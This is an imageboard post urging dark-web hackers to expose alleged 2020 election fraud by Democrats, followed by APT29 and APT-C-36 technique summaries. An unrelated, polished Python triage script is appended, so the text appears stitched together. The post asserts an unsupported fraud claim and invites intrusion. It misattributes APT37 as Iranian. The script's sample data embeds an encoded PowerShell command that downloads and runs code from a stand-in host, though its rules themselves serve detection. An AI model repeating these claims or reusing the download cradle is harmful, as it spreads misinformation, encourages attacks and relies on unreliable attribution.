Anonymous ID: 65d796 Aug. 9, 2022, 4:22 a.m. No.17317307

If I post a DarkWeb request for the best international hacking groups in the world to reveal corrupted Washington DC Democrats' 2020 election-fraud participation proof, I think some damning evidence would be revealed…

Hacker Groups:

APT29 and Associated Groups:

IRON RITUAL
IRON HEMLOCK
NobleBaron
Dark Halo
StellarParticle
NOBELIUM
UNC2452
YTTRIUM
The Dukes
Cozy Bear
CozyDuke

APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.

APT29 added their own devices as allowed IDs for ActiveSync using Set-CASMailbox, allowing them to obtain copies of victim mailboxes. They also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Applications or Service Principals.

APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and execute other commands.

North Korean Government Group:
InkySquid

Iranian Government Group:
APT37

APT-C-36

APT-C-36 is a suspected South American espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.

APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document being opened.

APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password-protected, encrypted email attachments to avoid detection.
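The APT29 tradecraft listed above (password-protected 7-Zip staging, Set-CASMailbox with new ActiveSync device IDs, Mail.Read/Mail.ReadWrite grants to service principals, and encoded PowerShell) is what a defender would actually hunt for. Below is an added example, not part of the original post or of any vendor's product, showing simple triage rules run over constructed sample log records. The flattened field names (source, host, command_line, cmdlet, parameters, operation, target, permission) and the sample values are assumptions made for the example; only the cmdlet, parameter, permission and switch names come from the text or from the real tools.

```python
"""Triage rules for the APT29 techniques described above, run over constructed sample events."""
import base64
import re
from typing import Dict, List, Optional

# Constructed sample events shaped like flattened SIEM records. The field names are an
# assumption for this example, not any vendor's schema. Hosts, identities and the TEST-NET
# URL are made up.
ENCODED_PAYLOAD = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/s")'.encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"source": "sysmon", "host": "ws01",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + ENCODED_PAYLOAD},
    {"source": "sysmon", "host": "ws01",
     "command_line": r'"C:\Program Files\7-Zip\7z.exe" a -pHunter22 -mhe=on C:\Users\Public\m.7z C:\Users\j\AppData\Local\Microsoft\Outlook\*.ost'},
    {"source": "exchange_admin_audit", "host": "ex01", "cmdlet": "Set-CASMailbox",
     "parameters": "Identity=cfo@corp.example; ActiveSyncAllowedDeviceIDs=ABCD1234EF567890"},
    {"source": "aad_audit", "host": "tenant",
     "operation": "Add app role assignment to service principal",
     "target": "sp-mailsync", "permission": "Mail.ReadWrite"},
    # Benign events: no alert expected for either of these.
    {"source": "sysmon", "host": "ws02",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"source": "exchange_admin_audit", "host": "ex01", "cmdlet": "Set-CASMailbox",
     "parameters": "Identity=jdoe@corp.example; OWAEnabled=False"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the common spellings.
# -ExecutionPolicy does not match because the suffix alternatives require c/n or whitespace.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
SEVENZIP_ADD = re.compile(r'(?i)7za?\.exe"?\s+a\s')       # 7z.exe / 7za.exe with the "a" (add) command
SEVENZIP_PASSWORD = re.compile(r"(?<!\S)-p(\S+)")         # -p<password> switch
SEVENZIP_HEADER_ENC = re.compile(r"(?i)(?<!\S)-mhe=on")   # encrypt archive headers (hides file names)
MAIL_SCOPES = {"mail.read", "mail.readwrite"}             # the Graph scopes named in the text; extend as needed


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script of an -EncodedCommand launch, or None if there is none."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")  # PowerShell encodes UTF-16LE


def sevenzip_password_archive(command_line: str) -> Optional[Dict[str, bool]]:
    """Flag 7-Zip creating an archive with a password (the staging step in the text)."""
    if not SEVENZIP_ADD.search(command_line) or not SEVENZIP_PASSWORD.search(command_line):
        return None
    return {"password_set": True, "header_encryption": bool(SEVENZIP_HEADER_ENC.search(command_line))}


def parse_parameters(params: str) -> Dict[str, str]:
    """Parse 'Key=Value; Key=Value' cmdlet parameter strings into a lower-cased dict."""
    out: Dict[str, str] = {}
    for part in params.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out


def activesync_device_added(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag Set-CASMailbox runs that add ActiveSync device IDs to a mailbox."""
    if event.get("cmdlet", "").lower() != "set-casmailbox":
        return None
    params = parse_parameters(event.get("parameters", ""))
    ids = params.get("activesyncalloweddeviceids")
    if not ids:
        return None
    return {"mailbox": params.get("identity", "?"), "device_ids": [i.strip() for i in ids.split(",")]}


def mail_permission_granted(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Flag app-role grants of mail-reading scopes to a service principal."""
    if "app role assignment" not in event.get("operation", "").lower():
        return None
    permission = event.get("permission", "")
    if permission.lower() not in MAIL_SCOPES:
        return None
    return {"service_principal": event.get("target", "?"), "permission": permission}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every rule over every event and return the alerts in event order."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        host = ev.get("host", "?")
        cmd = ev.get("command_line", "")
        if cmd:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                alerts.append({"rule": "encoded_powershell", "host": host, "detail": decoded})
            archive = sevenzip_password_archive(cmd)
            if archive:
                alerts.append({"rule": "password_protected_archive", "host": host, "detail": archive})
        device = activesync_device_added(ev)
        if device:
            alerts.append({"rule": "activesync_device_added", "host": host, "detail": device})
        grant = mail_permission_granted(ev)
        if grant:
            alerts.append({"rule": "mail_permission_granted", "host": host, "detail": grant})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["rule"], alert["host"], alert["detail"])
```

The two benign records show the rules do not fire on ordinary administration (a scripted -ExecutionPolicy launch, a Set-CASMailbox call that only changes OWAEnabled). In a real tenant the ActiveSync and permission-grant rules should be joined against who ran the cmdlet and whether a change ticket exists, since both actions are legitimate when an admin does them.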